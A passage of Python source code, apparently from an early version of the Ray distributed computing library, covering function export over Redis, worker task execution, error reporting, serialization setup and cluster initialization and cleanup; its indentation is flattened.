# export it when connect is called. Otherwise, run the function on all
# workers.
if self.mode is None:
self.cached_functions_to_run.append(function)
else:
# Attempt to pickle the function before we need it. This could
# fail, and it is more convenient if the failure happens before we
# actually run the function locally.
pickled_function = pickle.dumps(function)
function_to_run_id = hashlib.sha1(pickled_function).digest()
key = b"FunctionsToRun:" + function_to_run_id
# First run the function on the driver.
# We always run the task locally.
function({"worker": self})
# Check if the function has already been put into redis.
function_exported = self.redis_client.setnx(b"Lock:" + key, 1)
if not function_exported:
# In this case, the function has already been exported, so
# we don't need to export it again.
return
# Run the function on all workers.
self.redis_client.hmset(key,
{"driver_id": self.task_driver_id.id(),
"function_id": function_to_run_id,
"function": pickled_function})
self.redis_client.rpush("Exports", key)
# TODO(rkn): If the worker fails after it calls setnx and before it
# successfully completes the hmset and rpush, then the program will
# most likely hang. This could be fixed by making these three
# operations into a transaction (or by implementing a custom
# command that does all three things).
def _wait_for_function(self, function_id, driver_id, timeout=10):
"""Wait until the function to be executed is present on this worker.
This method will simply loop until the import thread has imported the
relevant function. If we spend too long in this loop, that may indicate
a problem somewhere and we will push an error message to the user.
If this worker is an actor, then this will wait until the actor has
been defined.
Args:
is_actor (bool): True if this worker is an actor, and false
otherwise.
function_id (str): The ID of the function that we want to execute.
driver_id (str): The ID of the driver to push the error message to
if this times out.
"""
start_time = time.time()
# Only send the warning once.
warning_sent = False
while True:
with self.lock:
if (self.actor_id == NIL_ACTOR_ID and
(function_id.id() in self.functions[driver_id])):
break
elif self.actor_id != NIL_ACTOR_ID and (self.actor_id in
self.actors):
break
if time.time() - start_time > timeout:
warning_message = ("This worker was asked to execute a "
"function that it does not have "
"registered. You may have to restart "
"Ray.")
if not warning_sent:
ray.utils.push_error_to_driver(self.redis_client,
"wait_for_function",
warning_message,
driver_id=driver_id)
warning_sent = True
time.sleep(0.001)
def _get_arguments_for_execution(self, function_name, serialized_args):
"""Retrieve the arguments for the remote function.
This retrieves the values for the arguments to the remote function that
were passed in as object IDs. Argumens that were passed by value are
not changed. This is called by the worker that is executing the remote
function.
Args:
function_name (str): The name of the remote function whose
arguments are being retrieved.
serialized_args (List): The arguments to the function. These are
either strings representing serialized objects passed by value
or they are ObjectIDs.
Returns:
The retrieved arguments in addition to the arguments that were
passed by value.
Raises:
RayGetArgumentError: This exception is raised if a task that
created one of the arguments failed.
"""
arguments = []
for (i, arg) in enumerate(serialized_args):
if isinstance(arg, ray.local_scheduler.ObjectID):
# get the object from the local object store
argument = self.get_object([arg])[0]
if isinstance(argument, RayTaskError):
# If the result is a RayTaskError, then the task that
# created this object failed, and we should propagate the
# error message here.
raise RayGetArgumentError(function_name, i, arg, argument)
elif isinstance(argument, ray.actor.ActorHandleWrapper):
argument = ray.actor.unwrap_actor_handle(self, argument)
else:
# pass the argument by value
argument = arg
arguments.append(argument)
return arguments
def _store_outputs_in_objstore(self, object_ids, outputs):
"""Store the outputs of a remote function in the local object store.
This stores the values that were returned by a remote function in the
local object store. If any of the return values are object IDs, then
these object IDs are aliased with the object IDs that the scheduler
assigned for the return values. This is called by the worker that
executes the remote function.
Note:
The arguments object_ids and outputs should have the same length.
Args:
object_ids (List[ObjectID]): The object IDs that were assigned to
the outputs of the remote function call.
outputs (Tuple): The value returned by the remote function. If the
remote function was supposed to only return one value, then its
output was wrapped in a tuple with one element prior to being
passed into this function.
"""
for i in range(len(object_ids)):
self.put_object(object_ids[i], outputs[i])
def _process_task(self, task):
"""Execute a task assigned to this worker.
This method deserializes a task from the scheduler, and attempts to
execute the task. If the task succeeds, the outputs are stored in the
local object store. If the task throws an exception, RayTaskError
objects are stored in the object store to represent the failed task
(these will be retrieved by calls to get or by subsequent tasks that
use the outputs of this task).
"""
# The ID of the driver that this task belongs to. This is needed so
# that if the task throws an exception, we propagate the error
# message to the correct driver.
self.task_driver_id = task.driver_id()
self.current_task_id = task.task_id()
self.current_function_id = task.function_id().id()
self.task_index = 0
self.put_index = 0
function_id = task.function_id()
args = task.arguments()
return_object_ids = task.returns()
if task.actor_id().id() != NIL_ACTOR_ID:
dummy_return_id = return_object_ids.pop()
function_name, function_executor = (self.functions
[self.task_driver_id.id()]
[function_id.id()])
# Get task arguments from the object store.
try:
with log_span("ray:task:get_arguments", worker=self):
arguments = self._get_arguments_for_execution(function_name,
args)
except (RayGetError, RayGetArgumentError) as e:
self._handle_process_task_failure(function_id, return_object_ids,
e, None)
return
except Exception as e:
self._handle_process_task_failure(
function_id, return_object_ids, e,
ray.utils.format_error_message(traceback.format_exc()))
return
# Execute the task.
try:
with log_span("ray:task:execute", worker=self):
if task.actor_id().id() == NIL_ACTOR_ID:
outputs = function_executor.executor(arguments)
else:
outputs = function_executor(
dummy_return_id,
self.actors[task.actor_id().id()],
*arguments)
except Exception as e:
# Determine whether the exception occured during a task, not an
# actor method.
task_exception = task.actor_id().id() == NIL_ACTOR_ID
traceback_str = ray.utils.format_error_message(
traceback.format_exc(), task_exception=task_exception)
self._handle_process_task_failure(function_id, return_object_ids,
e, traceback_str)
return
# Store the outputs in the local object store.
try:
with log_span("ray:task:store_outputs", worker=self):
# If this is an actor task, then the last object ID returned by
# the task is a dummy output, not returned by the function
# itself. Decrement to get the correct number of return values.
num_returns = len(return_object_ids)
if num_returns == 1:
outputs = (outputs,)
self._store_outputs_in_objstore(return_object_ids, outputs)
except Exception as e:
self._handle_process_task_failure(
function_id, return_object_ids, e,
ray.utils.format_error_message(traceback.format_exc()))
def _handle_process_task_failure(self, function_id, return_object_ids,
error, backtrace):
function_name, _ = self.functions[
self.task_driver_id.id()][function_id.id()]
failure_object = RayTaskError(function_name, error, backtrace)
failure_objects = [failure_object for _ in
range(len(return_object_ids))]
self._store_outputs_in_objstore(return_object_ids, failure_objects)
# Log the error message.
ray.utils.push_error_to_driver(self.redis_client,
"task",
str(failure_object),
driver_id=self.task_driver_id.id(),
data={"function_id": function_id.id(),
"function_name": function_name})
def _become_actor(self, task):
"""Turn this worker into an actor.
Args:
task: The actor creation task.
"""
assert self.actor_id == NIL_ACTOR_ID
arguments = task.arguments()
assert len(arguments) == 1
self.actor_id = task.actor_creation_id().id()
class_id = arguments[0]
key = b"ActorClass:" + class_id
# Wait for the actor class key to have been imported by the import
# thread. TODO(rkn): It shouldn't be possible to end up in an infinite
# loop here, but we should push an error to the driver if too much time
# is spent here.
while key not in self.imported_actor_classes:
time.sleep(0.001)
with self.lock:
self.fetch_and_register_actor(key, task.required_resources(), self)
def _wait_for_and_process_task(self, task):
"""Wait for a task to be ready and process the task.
Args:
task: The task to execute.
"""
function_id = task.function_id()
# TODO(rkn): It would be preferable for actor creation tasks to share
# more of the code path with regular task execution.
if (task.actor_creation_id() !=
ray.local_scheduler.ObjectID(NIL_ACTOR_ID)):
self._become_actor(task)
return
# Wait until the function to be executed has actually been registered
# on this worker. We will push warnings to the user if we spend too
# long in this loop.
with log_span("ray:wait_for_function", worker=self):
self._wait_for_function(function_id, task.driver_id().id())
# Execute the task.
# TODO(rkn): Consider acquiring this lock with a timeout and pushing a
# warning to the user if we are waiting too long to acquire the lock
# because that may indicate that the system is hanging, and it'd be
# good to know where the system is hanging.
log(event_type="ray:acquire_lock", kind=LOG_SPAN_START, worker=self)
with self.lock:
log(event_type="ray:acquire_lock", kind=LOG_SPAN_END,
worker=self)
function_name, _ = (self.functions[task.driver_id().id()]
[function_id.id()])
contents = {"function_name": function_name,
"task_id": task.task_id().hex(),
"worker_id": binary_to_hex(self.worker_id)}
with log_span("ray:task", contents=contents, worker=self):
self._process_task(task)
# Push all of the log events to the global state store.
flush_log()
# Increase the task execution counter.
(self.num_task_executions[task.driver_id().id()]
[function_id.id()]) += 1
reached_max_executions = (
self.num_task_executions[task.driver_id().id()]
[function_id.id()] ==
self.function_properties[task.driver_id().id()]
[function_id.id()].max_calls)
if reached_max_executions:
ray.worker.global_worker.local_scheduler_client.disconnect()
os._exit(0)
def _get_next_task_from_local_scheduler(self):
"""Get the next task from the local scheduler.
Returns:
A task from the local scheduler.
"""
with log_span("ray:get_task", worker=self):
task = self.local_scheduler_client.get_task()
# Automatically restrict the GPUs available to this task.
ray.utils.set_cuda_visible_devices(ray.get_gpu_ids())
return task
def main_loop(self):
"""The main loop a worker runs to receive and execute tasks."""
def exit(signum, frame):
cleanup(worker=self)
sys.exit(0)
signal.signal(signal.SIGTERM, exit)
check_main_thread()
while True:
task = self._get_next_task_from_local_scheduler()
self._wait_for_and_process_task(task)
def get_gpu_ids():
"""Get the IDs of the GPUs that are available to the worker.
If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
started up, then the IDs returned by this method will be a subset of the
IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
[0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.
Returns:
A list of GPU IDs.
"""
if _mode() == PYTHON_MODE:
raise Exception("ray.get_gpu_ids() currently does not work in PYTHON "
"MODE.")
assigned_ids = global_worker.local_scheduler_client.gpu_ids()
# If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
# the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be
# returned).
if global_worker.original_gpu_ids is not None:
assigned_ids = [global_worker.original_gpu_ids[gpu_id]
for gpu_id in assigned_ids]
return assigned_ids
def _webui_url_helper(client):
"""Parsing for getting the url of the web UI.
Args:
client: A redis client to use to query the primary Redis shard.
Returns:
The URL of the web UI as a string.
"""
result = client.hmget("webui", "url")[0]
return result.decode("ascii") if result is not None else result
def get_webui_url():
"""Get the URL to access the web UI.
Note that the URL does not specify which node the web UI is on.
Returns:
The URL of the web UI as a string.
"""
if _mode() == PYTHON_MODE:
raise Exception("ray.get_webui_url() currently does not work in "
"PYTHON MODE.")
return _webui_url_helper(global_worker.redis_client)
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
global_state = state.GlobalState()
class RayConnectionError(Exception):
pass
def check_main_thread():
"""Check that we are currently on the main thread.
Raises:
Exception: An exception is raised if this is called on a thread other
than the main thread.
"""
if threading.current_thread().getName() != "MainThread":
raise Exception("The Ray methods are not thread safe and must be "
"called from the main thread. This method was called "
"from thread {}."
.format(threading.current_thread().getName()))
def check_connected(worker=global_worker):
"""Check if the worker is connected.
Raises:
Exception: An exception is raised if the worker is not connected.
"""
if not worker.connected:
raise RayConnectionError("This command cannot be called before Ray "
"has been started. You can start Ray with "
"'ray.init()'.")
def print_failed_task(task_status):
"""Print information about failed tasks.
Args:
task_status (Dict): A dictionary containing the name, operationid, and
error message for a failed task.
"""
print("""
Error: Task failed
Function Name: {}
Task ID: {}
Error Message: \n{}
""".format(task_status["function_name"], task_status["operationid"],
task_status["error_message"]))
def error_applies_to_driver(error_key, worker=global_worker):
"""Return True if the error is for this driver and false otherwise."""
# TODO(rkn): Should probably check that this is only called on a driver.
# Check that the error key is formatted as in push_error_to_driver.
assert len(error_key) == (len(ERROR_KEY_PREFIX) + DRIVER_ID_LENGTH + 1 +
ERROR_ID_LENGTH), error_key
# If the driver ID in the error message is a sequence of all zeros, then
# the message is intended for all drivers.
generic_driver_id = DRIVER_ID_LENGTH * b"\x00"
driver_id = error_key[len(ERROR_KEY_PREFIX):(len(ERROR_KEY_PREFIX) +
DRIVER_ID_LENGTH)]
return (driver_id == worker.task_driver_id.id() or
driver_id == generic_driver_id)
def error_info(worker=global_worker):
"""Return information about failed tasks."""
check_connected(worker)
check_main_thread()
error_keys = worker.redis_client.lrange("ErrorKeys", 0, -1)
errors = []
for error_key in error_keys:
if error_applies_to_driver(error_key, worker=worker):
error_contents = worker.redis_client.hgetall(error_key)
errors.append(error_contents)
return errors
def _initialize_serialization(worker=global_worker):
"""Initialize the serialization library.
This defines a custom serializer for object IDs and also tells ray to
serialize several exception classes that we define for error handling.
"""
worker.serialization_context = pyarrow.default_serialization_context()
# Tell the serialization context to use the cloudpickle version that we
# ship with Ray.
worker.serialization_context.set_pickle(pickle.dumps, pickle.loads)
pyarrow.register_torch_serialization_handlers(worker.serialization_context)
# Define a custom serializer and deserializer for handling Object IDs.
def objectid_custom_serializer(obj):
return obj.id()
def objectid_custom_deserializer(serialized_obj):
return ray.local_scheduler.ObjectID(serialized_obj)
worker.serialization_context.register_type(
ray.local_scheduler.ObjectID, "ray.ObjectID", pickle=False,
custom_serializer=objectid_custom_serializer,
custom_deserializer=objectid_custom_deserializer)
if worker.mode in [SCRIPT_MODE, SILENT_MODE]:
# These should only be called on the driver because
# register_custom_serializer will export the class to all of the
# workers.
register_custom_serializer(RayTaskError, use_dict=True)
register_custom_serializer(RayGetError, use_dict=True)
register_custom_serializer(RayGetArgumentError, use_dict=True)
# Tell Ray to serialize lambdas with pickle.
register_custom_serializer(type(lambda: 0), use_pickle=True)
# Tell Ray to serialize types with pickle.
register_custom_serializer(type(int), use_pickle=True)
# Ray can serialize actor handles that have been wrapped.
register_custom_serializer(ray.actor.ActorHandleWrapper,
use_dict=True)
# Tell Ray to serialize FunctionSignatures as dictionaries. This is
# used when passing around actor handles.
register_custom_serializer(ray.signature.FunctionSignature,
use_dict=True)
def get_address_info_from_redis_helper(redis_address, node_ip_address):
redis_ip_address, redis_port = redis_address.split(":")
# For this command to work, some other client (on the same machine as
# Redis) must have run "CONFIG SET protected-mode no".
redis_client = redis.StrictRedis(host=redis_ip_address,
port=int(redis_port))
# The client table prefix must be kept in sync with the file
# "src/common/redis_module/ray_redis_module.cc" where it is defined.
REDIS_CLIENT_TABLE_PREFIX = "CL:"
client_keys = redis_client.keys("{}*".format(REDIS_CLIENT_TABLE_PREFIX))
# Filter to live clients on the same node and do some basic checking.
plasma_managers = []
local_schedulers = []
for key in client_keys:
info = redis_client.hgetall(key)
# Ignore clients that were deleted.
deleted = info[b"deleted"]
deleted = bool(int(deleted))
if deleted:
continue
assert b"ray_client_id" in info
assert b"node_ip_address" in info
assert b"client_type" in info
client_node_ip_address = info[b"node_ip_address"].decode("ascii")
if (client_node_ip_address == node_ip_address or
(client_node_ip_address == "127.0.0.1" and
redis_ip_address == ray.services.get_node_ip_address())):
if info[b"client_type"].decode("ascii") == "plasma_manager":
plasma_managers.append(info)
elif info[b"client_type"].decode("ascii") == "local_scheduler":
local_schedulers.append(info)
# Make sure that we got at least one plasma manager and local scheduler.
assert len(plasma_managers) >= 1
assert len(local_schedulers) >= 1
# Build the address information.
object_store_addresses = []
for manager in plasma_managers:
address = manager[b"manager_address"].decode("ascii")
port = services.get_port(address)
object_store_addresses.append(
services.ObjectStoreAddress(
name=manager[b"store_socket_name"].decode("ascii"),
manager_name=manager[b"manager_socket_name"].decode("ascii"),
manager_port=port))
scheduler_names = [
scheduler[b"local_scheduler_socket_name"].decode("ascii")
for scheduler in local_schedulers]
client_info = {"node_ip_address": node_ip_address,
"redis_address": redis_address,
"object_store_addresses": object_store_addresses,
"local_scheduler_socket_names": scheduler_names,
# Web UI should be running.
"webui_url": _webui_url_helper(redis_client)}
return client_info
def get_address_info_from_redis(redis_address, node_ip_address, num_retries=5):
counter = 0
while True:
try:
return get_address_info_from_redis_helper(redis_address,
node_ip_address)
except Exception as e:
if counter == num_retries:
raise
# Some of the information may not be in Redis yet, so wait a little
# bit.
print("Some processes that the driver needs to connect to have "
"not registered with Redis, so retrying. Have you run "
"'ray start' on this node?")
time.sleep(1)
counter += 1
def _normalize_resource_arguments(num_cpus, num_gpus, resources,
num_local_schedulers):
"""Stick the CPU and GPU arguments into the resources dictionary.
This also checks that the arguments are well-formed.
Args:
num_cpus: Either a number of CPUs or a list of numbers of CPUs.
num_gpus: Either a number of CPUs or a list of numbers of CPUs.
resources: Either a dictionary of resource mappings or a list of
dictionaries of resource mappings.
num_local_schedulers: The number of local schedulers.
Returns:
A list of dictionaries of resources of length num_local_schedulers.
"""
if resources is None:
resources = {}
if not isinstance(num_cpus, list):
num_cpus = num_local_schedulers * [num_cpus]
if not isinstance(num_gpus, list):
num_gpus = num_local_schedulers * [num_gpus]
if not isinstance(resources, list):
resources = num_local_schedulers * [resources]
new_resources = [r.copy() for r in resources]
for i in range(num_local_schedulers):
assert "CPU" not in new_resources[i], "Use the 'num_cpus' argument."
assert "GPU" not in new_resources[i], "Use the 'num_gpus' argument."
if num_cpus[i] is not None:
new_resources[i]["CPU"] = num_cpus[i]
if num_gpus[i] is not None:
new_resources[i]["GPU"] = num_gpus[i]
return new_resources
def _init(address_info=None,
start_ray_local=False,
object_id_seed=None,
num_workers=None,
num_local_schedulers=None,
object_store_memory=None,
driver_mode=SCRIPT_MODE,
redirect_worker_output=False,
redirect_output=True,
start_workers_from_local_scheduler=True,
num_cpus=None,
num_gpus=None,
resources=None,
num_redis_shards=None,
redis_max_clients=None,
plasma_directory=None,
huge_pages=False,
include_webui=True):
"""Helper method to connect to an existing Ray cluster or start a new one.
This method handles two cases. Either a Ray cluster already exists and we
just attach this driver to it, or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
Args:
address_info (dict): A dictionary with address information for
processes in a partially-started Ray cluster. If
start_ray_local=True, any processes not in this dictionary will be
started. If provided, an updated address_info dictionary will be
returned to include processes that are newly started.
start_ray_local (bool): If True then this will start any processes not
already in address_info, including Redis, a global scheduler, local
scheduler(s), object store(s), and worker(s). It will also kill
these processes when Python exits. If False, this will attach to an
existing Ray cluster.
object_id_seed (int): Used to seed the deterministic generation of
object IDs. The same value can be used across multiple runs of the
same job in order to generate the object IDs in a consistent
manner. However, the same ID should not be used for different jobs.
num_workers (int): The number of workers to start. This is only
provided if start_ray_local is True.
num_local_schedulers (int): The number of local schedulers to start.
This is only provided if start_ray_local is True.
object_store_memory: The amount of memory (in bytes) to start the
object store with.
driver_mode (bool): The mode in which to start the driver. This should
be one of ray.SCRIPT_MODE, ray.PYTHON_MODE, and ray.SILENT_MODE.
redirect_worker_output: True if the stdout and stderr of worker
processes should be redirected to files.
redirect_output (bool): True if stdout and stderr for non-worker
processes should be redirected to files and false otherwise.
start_workers_from_local_scheduler (bool): If this flag is True, then
start the initial workers from the local scheduler. Else, start
them from Python. The latter case is for debugging purposes only.
num_cpus (int): Number of cpus the user wishes all local schedulers to
be configured with.
num_gpus (int): Number of gpus the user wishes all local schedulers to
be configured with. If unspecified, Ray will attempt to autodetect
the number of GPUs available on the node (note that autodetection
currently only works for Nvidia GPUs).
resources: A dictionary mapping resource names to the quantity of that
resource available.
num_redis_shards: The number of Redis shards to start in addition to
the primary Redis shard.
redis_max_clients: If provided, attempt to configure Redis with this
maxclients number.
plasma_directory: A directory where the Plasma memory mapped files will
be created.
huge_pages: Boolean flag indicating whether to start the Object
Store with hugetlbfs support. Requires plasma_directory.
include_webui: Boolean flag indicating whether to start the web
UI, which is a Jupyter notebook.
Returns:
Address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
check_main_thread()
if driver_mode not in [SCRIPT_MODE, PYTHON_MODE, SILENT_MODE]:
raise Exception("Driver_mode must be in [ray.SCRIPT_MODE, "
"ray.PYTHON_MODE, ray.SILENT_MODE].")
# Get addresses of existing services.
if address_info is None:
address_info = {}
else:
assert isinstance(address_info, dict)
node_ip_address = address_info.get("node_ip_address")
redis_address = address_info.get("redis_address")
# Start any services that do not yet exist.
if driver_mode == PYTHON_MODE:
# If starting Ray in PYTHON_MODE, don't start any other processes.
pass
elif start_ray_local:
# In this case, we launch a scheduler, a new object store, and some
# workers, and we connect to them. We do not launch any processes that
# are already registered in address_info.
# Use the address 127.0.0.1 in local mode.
node_ip_address = ("127.0.0.1" if node_ip_address is None
else node_ip_address)
# Use 1 local scheduler if num_local_schedulers is not provided. If
# existing local schedulers are provided, use that count as
# num_local_schedulers.
local_schedulers = address_info.get("local_scheduler_socket_names", [])
if num_local_schedulers is None:
if len(local_schedulers) > 0:
num_local_schedulers = len(local_schedulers)
else:
num_local_schedulers = 1
# Use 1 additional redis shard if num_redis_shards is not provided.
num_redis_shards = 1 if num_redis_shards is None else num_redis_shards
# Stick the CPU and GPU resources into the resource dictionary.
resources = _normalize_resource_arguments(num_cpus, num_gpus,
resources,
num_local_schedulers)
# Start the scheduler, object store, and some workers. These will be
# killed by the call to cleanup(), which happens when the Python script
# exits.
address_info = services.start_ray_head(
address_info=address_info,
node_ip_address=node_ip_address,
num_workers=num_workers,
num_local_schedulers=num_local_schedulers,
object_store_memory=object_store_memory,
redirect_worker_output=redirect_worker_output,
redirect_output=redirect_output,
start_workers_from_local_scheduler=(
start_workers_from_local_scheduler),
resources=resources,
num_redis_shards=num_redis_shards,
redis_max_clients=redis_max_clients,
plasma_directory=plasma_directory,
huge_pages=huge_pages,
include_webui=include_webui)
else:
if redis_address is None:
raise Exception("When connecting to an existing cluster, "
"redis_address must be provided.")
if num_workers is not None:
raise Exception("When connecting to an existing cluster, "
"num_workers must not be provided.")
if num_local_schedulers is not None:
raise Exception("When connecting to an existing cluster, "
"num_local_schedulers must not be provided.")
if num_cpus is not None or num_gpus is not None:
raise Exception("When connecting to an existing cluster, num_cpus "
"and num_gpus must not be provided.")
if resources is not None:
raise Exception("When connecting to an existing cluster, "
"resources must not be provided.")
if num_redis_shards is not None:
raise Exception("When connecting to an existing cluster, "
"num_redis_shards must not be provided.")
if redis_max_clients is not None:
raise Exception("When connecting to an existing cluster, "
"redis_max_clients must not be provided.")
if object_store_memory is not None:
raise Exception("When connecting to an existing cluster, "
"object_store_memory must not be provided.")
if plasma_directory is not None:
raise Exception("When connecting to an existing cluster, "
"plasma_directory must not be provided.")
if huge_pages:
raise Exception("When connecting to an existing cluster, "
"huge_pages must not be provided.")
# Get the node IP address if one is not provided.
if node_ip_address is None:
node_ip_address = services.get_node_ip_address(redis_address)
# Get the address info of the processes to connect to from Redis.
address_info = get_address_info_from_redis(redis_address,
node_ip_address)
# Connect this driver to Redis, the object store, and the local scheduler.
# Choose the first object store and local scheduler if there are multiple.
# The corresponding call to disconnect will happen in the call to cleanup()
# when the Python script exits.
if driver_mode == PYTHON_MODE:
driver_address_info = {}
else:
driver_address_info = {
"node_ip_address": node_ip_address,
"redis_address": address_info["redis_address"],
"store_socket_name": (
address_info["object_store_addresses"][0].name),
"manager_socket_name": (
address_info["object_store_addresses"][0].manager_name),
"local_scheduler_socket_name": (
address_info["local_scheduler_socket_names"][0]),
"webui_url": address_info["webui_url"]}
connect(driver_address_info, object_id_seed=object_id_seed,
mode=driver_mode, worker=global_worker)
return address_info
def init(redis_address=None, node_ip_address=None, object_id_seed=None,
num_workers=None, driver_mode=SCRIPT_MODE,
redirect_worker_output=False, redirect_output=True,
num_cpus=None, num_gpus=None, resources=None,
num_custom_resource=None, num_redis_shards=None,
redis_max_clients=None, plasma_directory=None,
huge_pages=False, include_webui=True, object_store_memory=None):
"""Connect to an existing Ray cluster or start one and connect to it.
This method handles two cases. Either a Ray cluster already exists and we
just attach this driver to it, or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
Args:
node_ip_address (str): The IP address of the node that we are on.
redis_address (str): The address of the Redis server to connect to. If
this address is not provided, then this command will start Redis, a
global scheduler, a local scheduler, a plasma store, a plasma
manager, and some workers. It will also kill these processes when
Python exits.
object_id_seed (int): Used to seed the deterministic generation of
object IDs. The same value can be used across multiple runs of the
same job in order to generate the object IDs in a consistent
manner. However, the same ID should not be used for different jobs.
num_workers (int): The number of workers to start. This is only
provided if redis_address is not provided.
driver_mode (bool): The mode in which to start the driver. This should
be one of ray.SCRIPT_MODE, ray.PYTHON_MODE, and ray.SILENT_MODE.
redirect_worker_output: True if the stdout and stderr of worker
processes should be redirected to files.
redirect_output (bool): True if stdout and stderr for non-worker
processes should be redirected to files and false otherwise.
num_cpus (int): Number of cpus the user wishes all local schedulers to
be configured with.
num_gpus (int): Number of gpus the user wishes all local schedulers to
be configured with.
resources: A dictionary mapping the name of a resource to the quantity
of that resource available.
num_redis_shards: The number of Redis shards to start in addition to
the primary Redis shard.
redis_max_clients: If provided, attempt to configure Redis with this
maxclients number.
plasma_directory: A directory where the Plasma memory mapped files will
be created.
huge_pages: Boolean flag indicating whether to start the Object
Store with hugetlbfs support. Requires plasma_directory.
include_webui: Boolean flag indicating whether to start the web
UI, which is a Jupyter notebook.
object_store_memory: The amount of memory (in bytes) to start the
object store with.
Returns:
Address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
# Convert hostnames to numerical IP address.
if node_ip_address is not None:
node_ip_address = services.address_to_ip(node_ip_address)
if redis_address is not None:
redis_address = services.address_to_ip(redis_address)
info = {"node_ip_address": node_ip_address,
"redis_address": redis_address}
return _init(address_info=info, start_ray_local=(redis_address is None),
num_workers=num_workers, driver_mode=driver_mode,
redirect_worker_output=redirect_worker_output,
redirect_output=redirect_output, num_cpus=num_cpus,
num_gpus=num_gpus, resources=resources,
num_redis_shards=num_redis_shards,
redis_max_clients=redis_max_clients,
plasma_directory=plasma_directory,
huge_pages=huge_pages,
include_webui=include_webui,
object_store_memory=object_store_memory)
def cleanup(worker=global_worker):
"""Disconnect the worker, and terminate any processes started in init.
This will automatically run at the end when a Python process that uses Ray
exits. It is ok to run this twice in a row. Note that we manually call
services.cleanup() in the tests because we need to start and stop many
clusters in the tests, but the import and exit only happen once.
"""
disconnect(worker)
if hasattr(worker, "local_scheduler_client"):
del worker.local_scheduler_client
if hasattr(worker, "plasma_client"):
worker.plasma_client.disconnect()
if worker.mode in [SCRIPT_MODE, SILENT_MODE]:
# If this is a driver, push the finish time to Redis and clean up any
# other services that were started with the driver.
worker.redis_client.hmset(b"Drivers:" + worker.worker_id,
{"end_time": time.time()})
services.cleanup()
else:
# If this is not a driver, make sure there are no orphan processes,
# besides possibly the worker itself.
for process_type, processes in services.all_processes.items():
if process_type == services.PROCESS_TYPE_WORKER:
assert(len(processes)) <= 1
else:
assert(len(processes) == 0)
worker.set_mode(None)
atexit.register(cleanup)
# Define a custom excepthook so that if the driver exits with an exception, we
# can push that exception to Redis.
normal_excepthook = sys.excepthook
def custom_excepthook(type, value, tb):
# If this is a driver, push the exception to redis.
if global_worker.mode in [SCRIPT_MODE, SILENT_MODE]:
error_message = "".join(traceback.format_tb(tb))
global_worker.redis_client.hmset(b"Drivers:" + global_worker.worker_id,
{"exception": error_message})
# Call the normal excepthook.
normal_excepthook(type, value, tb)
sys.excepthook = custom_excepthook
def print_error_messages(worker):
"""Print error messages in the background on the driver.
This runs in a separate thread on the driver and prints error messages in
the background.
"""
# TODO(rkn): All error messages should have a "component" field indicating
# which process the error came from (e.g., a worker or a plasma store).
# Currently all error messages come from workers.
helpful_message = """
You can inspect errors by running
ray.error_info()
If this driver is hanging, start a new one with
ray.init(redis_address="{}")
""".format(worker.redis_address)
worker.error_message_pubsub_client = worker.redis_client.pubsub()
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
worker.error_message_pubsub_client.subscribe("__keyspace@0__:ErrorKeys")
num_errors_received = 0
# Get the exports that occurred before the call to subscribe.
with worker.lock:
error_keys = worker.redis_client.lrange("ErrorKeys", 0, -1)
for error_key in error_keys:
if error_applies_to_driver(error_key, worker=worker):
error_message = worker.redis_client.hget(
error_key, "message").decode("ascii")
print(error_message)
print(helpful_message)
num_errors_received += 1
try:
for msg in worker.error_message_pubsub_client.listen():
with worker.lock:
for error_key in worker.redis_client.lrange(
"ErrorKeys", num_errors_received, -1):
if error_applies_to_driver(error_key, worker=worker):
error_message = worker.redis_client.hget(
error_key, "message").decode("ascii")
print(error_message)
print(helpful_message)
num_errors_received += 1
except redis.ConnectionError:
# When Redis terminates the listen call will throw a ConnectionError,
# which we catch here.
pass
def fetch_and_register_remote_function(key, worker=global_worker):
"""Import a remote function."""
(driver_id, function_id_str, function_name,
serialized_function, num_return_vals, module, resources,
max_calls) = worker.redis_client.hmget(
key, ["driver_id",
"function_id",
"name",
"function",
"num_return_vals",
"module",
"resources",
"max_calls"])
function_id = ray.local_scheduler.ObjectID(function_id_str)
function_name = function_name.decode("ascii")
function_properties = FunctionProperties(
num_return_vals=int(num_return_vals),
resources=json.loads(resources.decode("ascii")),
max_calls=int(max_calls))
module = module.decode("ascii")
# This is a placeholder in case the function can't be unpickled. This will
# be overwritten if the function is successfully registered.
def f():
raise Exception("This function was not imported properly.")
remote_f_placeholder = remote(function_id=function_id)(lambda *xs: f())
worker.functions[driver_id][function_id.id()] = (function_name,
remote_f_placeholder)
worker.function_properties[driver_id][function_id.id()] = (
function_properties)
worker.num_task_executions[driver_id][function_id.id()] = 0
try:
function = pickle.loads(serialized_function)
except Exception:
# If an exception was thrown when the remote function was imported, we
# record the traceback and notify the scheduler of the failure.
traceback_str = ray.utils.format_error_message(traceback.format_exc())
# Log the error message.
ray.utils.push_error_to_driver(worker.redis_client,
"register_remote_function",
traceback_str,
driver_id=driver_id,
data={"function_id": function_id.id(),
"function_name": function_name})
else:
# TODO(rkn): Why is the below line necessary?
function.__module__ = module
worker.functions[driver_id][function_id.id()] = (
function_name, remote(function_id=function_id)(function))
# Add the function to the function table.
worker.redis_client.rpush(b"FunctionTable:" + function_id.id(),
worker.worker_id)
def fetch_and_execute_function_to_run(key, worker=global_worker):
"""Run on arbitrary function on the worker."""
driver_id, serialized_function = worker.redis_client.hmget(
key, ["driver_id", "function"])
if (worker.mode in [SCRIPT_MODE, SILENT_MODE] and
driver_id != worker.task_driver_id.id()):
# This export was from a different driver and there's no need for this
# driver to import it.
return
try:
# Deserialize the function.
function = pickle.loads(serialized_function)
# Run the function.
function({"worker": worker})
except Exception:
# If an exception was thrown when the function was run, we record the
# traceback and notify the scheduler of the failure.
traceback_str = traceback.format_exc()
# Log the error message.
name = function.__name__ if ("function" in locals() and
hasattr(function, "__name__")) else ""
ray.utils.push_error_to_driver(worker.redis_client,
"function_to_run",
traceback_str,
